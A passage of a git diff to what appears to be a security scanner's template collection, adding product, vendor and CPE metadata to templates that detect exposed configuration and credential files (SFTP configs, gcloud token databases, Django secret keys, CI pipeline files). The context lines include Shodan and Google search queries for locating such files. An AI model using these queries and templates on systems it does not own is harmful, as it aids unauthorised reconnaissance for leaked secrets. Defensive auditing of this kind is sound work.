4a0a00473045022019ae7446da8cf0c57c637cecd750773679e29ca526116d27a32b066d44aa735d022100d6965160cb2f94abccbd3d1cad0431a1b9cf64c94b1ab9f758c3e0d743993699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019ae7446da8cf0c57c637cecd750773679e29ca526116d27a32b066d44aa735d022100d6965160cb2f94abccbd3d1cad0431a1b9cf64c94b1ab9f758c3e0d743993699:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml index 402cdb55e6..f38d22772f 100644 --- a/http/exposures/configs/filestash-admin-config.yaml +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Admin Console" + product: filestash + vendor: filestash tags: exposure,filestash,config + classification: + cpe: cpe:2.3:a:filestash:filestash:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/ftp-credentials-exposure.yaml b/http/exposures/configs/ftp-credentials-exposure.yaml index d2f9e9e052..d7166468cf 100644 --- a/http/exposures/configs/ftp-credentials-exposure.yaml +++ b/http/exposures/configs/ftp-credentials-exposure.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 google-query: inurl:"/ftpsync.settings" + product: wing_ftp_server + vendor: wftpserver tags: config,ftp,exposure http: diff --git a/http/exposures/configs/gcloud-config-default.yaml b/http/exposures/configs/gcloud-config-default.yaml index a5c323dafe..0fdad4a656 100644 --- a/http/exposures/configs/gcloud-config-default.yaml +++ b/http/exposures/configs/gcloud-config-default.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:google:cloud_platform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"access_tokens.db" + product: cloud_platform + vendor: google tags: google,cloud,devops,exposure http: diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index ea44a8a352..8674ae3575 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 8 shodan-query: html:"JK Status Manager" + product: tomcat + vendor: apache tags: config,jk,status,exposure + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* http: - method: GET @@ -34,4 +38,4 @@ http: - type: word words: - "JK Status Manager" -# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/karma-config-js.yaml b/http/exposures/configs/karma-config-js.yaml index 5d33ce1777..314cffae4b 100644 --- a/http/exposures/configs/karma-config-js.yaml +++ b/http/exposures/configs/karma-config-js.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"karma.conf.js" + product: karma + vendor: karma_project tags: config,exposure,devops http: diff --git a/http/exposures/configs/magento-config-disclosure.yaml b/http/exposures/configs/magento-config-disclosure.yaml index ab692217ae..2cc700a592 100644 --- a/http/exposures/configs/magento-config-disclosure.yaml +++ b/http/exposures/configs/magento-config-disclosure.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento,exposure,credential,config http: diff --git a/http/exposures/configs/mercurial-hgignore.yaml b/http/exposures/configs/mercurial-hgignore.yaml index 3bbf18f2ac..038146960d 100644 --- a/http/exposures/configs/mercurial-hgignore.yaml +++ b/http/exposures/configs/mercurial-hgignore.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"hgignore" + product: mercurial + vendor: mercurial tags: exposure,hgignore,config,mercurial http: @@ -46,4 +49,4 @@ http: part: response negative: true condition: or -# digest: 490a0046304402206734ac004b2ada4fb5ae55af64ea6cbcda2c8305324e611fdf4808d9a16cde3202204ea9312820a5729f4511297d6dbb0d5cb0e4c7bff4496f02075169e2f65bb2b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206734ac004b2ada4fb5ae55af64ea6cbcda2c8305324e611fdf4808d9a16cde3202204ea9312820a5729f4511297d6dbb0d5cb0e4c7bff4496f02075169e2f65bb2b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/ovpn-config-exposed.yaml b/http/exposures/configs/ovpn-config-exposed.yaml index b045fe9e96..60c3d4f796 100644 --- a/http/exposures/configs/ovpn-config-exposed.yaml +++ b/http/exposures/configs/ovpn-config-exposed.yaml @@ -7,10 +7,13 @@ info: description: OVPS configuration download page was detected. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:openvpn:connect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"OVPN Config Download" + product: connect + vendor: openvpn tags: config,ovpn,exposure http: diff --git a/http/exposures/configs/phpsys-info.yaml b/http/exposures/configs/phpsys-info.yaml index 9b2806bd2b..6df3d9fa7f 100644 --- a/http/exposures/configs/phpsys-info.yaml +++ b/http/exposures/configs/phpsys-info.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"phpSysInfo" + product: phpsysinfo + vendor: phpsysinfo tags: config,exposure,phpsysinfo + classification: + cpe: cpe:2.3:a:phpsysinfo:phpsysinfo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/configs/rakefile-disclosure.yaml b/http/exposures/configs/rakefile-disclosure.yaml index 466670d5bb..c14f566d39 100644 --- a/http/exposures/configs/rakefile-disclosure.yaml +++ b/http/exposures/configs/rakefile-disclosure.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Rakefile" + product: ruby + vendor: ruby-lang tags: devops,exposure,rakefile,config,ruby,rails + classification: + cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/configs/redis-config.yaml b/http/exposures/configs/redis-config.yaml index d4943a0eaa..09ea2bae30 100644 --- a/http/exposures/configs/redis-config.yaml +++ b/http/exposures/configs/redis-config.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"redis.conf" + product: redis + vendor: redis tags: redis,exposure,config http: diff --git a/http/exposures/configs/rubocop-config.yaml b/http/exposures/configs/rubocop-config.yaml index bf01ad2f93..e8f2414903 100644 --- a/http/exposures/configs/rubocop-config.yaml +++ b/http/exposures/configs/rubocop-config.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:rubocop_project:rubocop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"rubocop.yml" + product: rubocop + vendor: rubocop_project tags: exposure,files,config,ruby http: diff --git a/http/exposures/configs/sftp-credentials-exposure.yaml b/http/exposures/configs/sftp-credentials-exposure.yaml index 31f0dd66c2..b9d96cde51 100644 --- a/http/exposures/configs/sftp-credentials-exposure.yaml +++ b/http/exposures/configs/sftp-credentials-exposure.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:southrivertech:titan_sftp_server:*:*:*:*:windows:*:*:* metadata: verified: true max-request: 2 github-query: filename:sftp-config.json + product: titan_sftp_server + vendor: southrivertech tags: sftp,config,exposure http: diff --git a/http/exposures/configs/svnserve-config.yaml b/http/exposures/configs/svnserve-config.yaml index 1bec9966d4..7f00d618d9 100644 --- a/http/exposures/configs/svnserve-config.yaml +++ b/http/exposures/configs/svnserve-config.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 google-query: intext:"configuration of the svnserve daemon" + product: subversion + vendor: apache tags: config,exposure,svnserve http: diff --git a/http/exposures/configs/symfony-profiler.yaml b/http/exposures/configs/symfony-profiler.yaml index bbe2cb7858..6adce03c53 100644 --- a/http/exposures/configs/symfony-profiler.yaml +++ b/http/exposures/configs/symfony-profiler.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"symfony Profiler" + product: symfony + vendor: sensiolabs tags: config,exposure,symfony http: @@ -29,4 +32,4 @@ http: words: - "Symfony Profiler" - "Profiler" -# digest: 490a0046304402207285a5678edfc83e5dc4aa50790daf8e5ce4cc726dd7a5908c5bd2307dba265c0220094894dbee97b527cd332a2efe812d3c6679369576d525e79894274465227faf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207285a5678edfc83e5dc4aa50790daf8e5ce4cc726dd7a5908c5bd2307dba265c0220094894dbee97b527cd332a2efe812d3c6679369576d525e79894274465227faf:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/vbulletin-path-disclosure.yaml b/http/exposures/configs/vbulletin-path-disclosure.yaml index 621dc74d5d..33fb50d173 100644 --- a/http/exposures/configs/vbulletin-path-disclosure.yaml +++ b/http/exposures/configs/vbulletin-path-disclosure.yaml @@ -10,7 +10,11 @@ info: verified: true max-request: 11 shodan-query: "title:\"vBulletin\"" + product: vbulletin + vendor: vbulletin tags: config,exposure,fpd,vbulletin + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: @@ -55,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d3e73d53cf79e65756b7ea8f63d32afb7c504cb49a5ce7c3eac1011cf700524022100eb99c5aa18691eacf4a8b477f61ddf4409d217306fff52ac289f07a5c96044c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d3e73d53cf79e65756b7ea8f63d32afb7c504cb49a5ce7c3eac1011cf700524022100eb99c5aa18691eacf4a8b477f61ddf4409d217306fff52ac289f07a5c96044c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/webpack-config.yaml b/http/exposures/configs/webpack-config.yaml index d03004ac8c..4f8536e17b 100644 --- a/http/exposures/configs/webpack-config.yaml +++ b/http/exposures/configs/webpack-config.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:* metadata: max-request: 1 shodan-query: html:"webpack.config.js" + product: webpack + vendor: webpack.js tags: config,exposure http: diff --git a/http/exposures/configs/wgetrc-config.yaml b/http/exposures/configs/wgetrc-config.yaml index 988ff73916..7d3c2aea29 100644 --- a/http/exposures/configs/wgetrc-config.yaml +++ b/http/exposures/configs/wgetrc-config.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:gnu:wget:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:".wgetrc" + product: wget + vendor: gnu tags: devops,exposure http: diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml index 3be4aca083..11aadded66 100644 --- a/http/exposures/configs/yii-debugger.yaml +++ b/http/exposures/configs/yii-debugger.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 6 shodan-query: title:"Yii Debugger" + product: yii + vendor: yii_software tags: yii,debug,exposure + classification: + cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/angular-json.yaml b/http/exposures/files/angular-json.yaml index dd588d3b8a..c1c0bde95d 100644 --- a/http/exposures/files/angular-json.yaml +++ b/http/exposures/files/angular-json.yaml @@ -10,8 +10,12 @@ info: shodan-query: - html:"angular.json" - html:"angular-cli.json" + product: angular + vendor: angularjs tags: exposure,angularjs,files + classification: + cpe: cpe:2.3:a:angularjs:angular:*:*:*:*:node.js:*:*:* http: - method: GET path: diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml index 885a145b8d..052398b7df 100644 --- a/http/exposures/files/azure-pipelines-exposed.yaml +++ b/http/exposures/files/azure-pipelines-exposed.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: html:"azure-pipelines.yml" + product: azure_pipelines_agent + vendor: microsoft tags: config,exposure,azure,microsoft,cloud,devops,files + classification: + cpe: cpe:2.3:a:microsoft:azure_pipelines_agent:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/bitbucket-pipelines.yaml b/http/exposures/files/bitbucket-pipelines.yaml index b9d5abc8a9..946e6068e4 100644 --- a/http/exposures/files/bitbucket-pipelines.yaml +++ b/http/exposures/files/bitbucket-pipelines.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"bitbucket-pipelines.yml" + product: bitbucket + vendor: atlassian tags: exposure,bitbucket,devops,cicd,files + classification: + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/cargo-toml-file.yaml b/http/exposures/files/cargo-toml-file.yaml index 787e78a0a6..103c988b68 100644 --- a/http/exposures/files/cargo-toml-file.yaml +++ b/http/exposures/files/cargo-toml-file.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Cargo.toml" + product: cargo + vendor: rust-lang tags: exposure,files,cargo + classification: + cpe: cpe:2.3:a:rust-lang:cargo:*:*:*:*:rust:*:*:* http: - method: GET path: diff --git a/http/exposures/files/cold-fusion-cfcache-map.yaml b/http/exposures/files/cold-fusion-cfcache-map.yaml index 7f3341a195..337c5602f2 100644 --- a/http/exposures/files/cold-fusion-cfcache-map.yaml +++ b/http/exposures/files/cold-fusion-cfcache-map.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" + product: coldfusion + vendor: adobe tags: exposure,coldfusion,adobe,files + classification: + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml index d45e365cfa..a59a4f62c5 100644 --- a/http/exposures/files/composer-auth-json.yaml +++ b/http/exposures/files/composer-auth-json.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 google-query: intext:"index of /" ".composer-auth.json" + product: composer + vendor: getcomposer tags: exposure,devops,files + classification: + cpe: cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/django-secret-key.yaml b/http/exposures/files/django-secret-key.yaml index d682cce94f..78c0cb291b 100644 --- a/http/exposures/files/django-secret-key.yaml +++ b/http/exposures/files/django-secret-key.yaml @@ -12,8 +12,12 @@ info: max-request: 7 shodan-query: html:settings.py comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' + product: django + vendor: djangoproject tags: django,exposure,files + classification: + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml index fde9c5d488..c8cc6f13a8 100644 --- a/http/exposures/files/environment-rb.yaml +++ b/http/exposures/files/environment-rb.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "environment.rb" + product: ruby + vendor: ruby-lang tags: ruby,devops,exposure,files + classification: + cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml index 24cfa47bfe..e0d7cbc97c 100644 --- a/http/exposures/files/get-access-token-json.yaml +++ b/http/exposures/files/get-access-token-json.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "get_access_token.json" + product: constant_contact_forms + vendor: constantcontact tags: exposure,files + classification: + cpe: cpe:2.3:a:constantcontact:constant_contact_forms:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml index 37964c09f0..8f6ef18d32 100644 --- a/http/exposures/files/git-mailmap.yaml +++ b/http/exposures/files/git-mailmap.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:mailmap + product: git + vendor: git-scm tags: config,exposure,git,mailmap,files + classification: + cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/gitlab-ci-yml.yaml b/http/exposures/files/gitlab-ci-yml.yaml index c412a0cf4a..637c492688 100644 --- a/http/exposures/files/gitlab-ci-yml.yaml +++ b/http/exposures/files/gitlab-ci-yml.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 2 shodan-query: html:"gitlab-ci.yml" + product: gitlab + vendor: gitlab tags: exposure,config,cicd,gitlab + classification: + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* http: - method: GET path: @@ -49,4 +53,4 @@ http: - "releasePath:" - "sshUser:" condition: and -# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml index cfc083b588..cabcd8916d 100644 --- a/http/exposures/files/go-mod-disclosure.yaml +++ b/http/exposures/files/go-mod-disclosure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"go.mod" + product: go + vendor: golang tags: exposure,files,go + classification: + cpe: cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index 279612ac7d..90a67934e2 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 github-query: filename:libs.versions.toml + product: gradle + vendor: gradle tags: file,gradle,exposure + classification: + cpe: cpe:2.3:a:gradle:gradle:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml index b8aed3952f..69974ff672 100644 --- a/http/exposures/files/npm-cli-metrics-json.yaml +++ b/http/exposures/files/npm-cli-metrics-json.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: html:"anonymous-cli-metrics.json" + product: npm + vendor: npmjs tags: npm,devops,exposure,files + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml index 29b8562bff..e838f6cc84 100644 --- a/http/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"npm-shrinkwrap.json" + product: npm + vendor: npmjs tags: config,exposure,npm,files,node + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/nuget-package-config.yaml b/http/exposures/files/nuget-package-config.yaml index 67760a0a3a..db1c16d613 100644 --- a/http/exposures/files/nuget-package-config.yaml +++ b/http/exposures/files/nuget-package-config.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: html:"packages.config" + product: nuget + vendor: microsoft tags: exposure,sass,devops,cicd,nuget,files + classification: + cpe: cpe:2.3:a:microsoft:nuget:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/oracle-test-cgi.yaml b/http/exposures/files/oracle-test-cgi.yaml index b766fb2de0..b34665e71f 100644 --- a/http/exposures/files/oracle-test-cgi.yaml +++ b/http/exposures/files/oracle-test-cgi.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Oracle Application Server" + product: http_server + vendor: oracle tags: oracle,exposure + classification: + cpe: cpe:2.3:a:oracle:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml index 6983fd5d4e..ee16dd8ee7 100644 --- a/http/exposures/files/php-ini.yaml +++ b/http/exposures/files/php-ini.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: php.ini + product: php + vendor: php tags: config,exposure,files + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml index aa2d3508c6..46d9449aba 100644 --- a/http/exposures/files/phpunit-result-cache-exposure.yaml +++ b/http/exposures/files/phpunit-result-cache-exposure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: ".phpunit.result.cache" + product: phpunit + vendor: phpunit_project tags: config,exposure,devops,files + classification: + cpe: 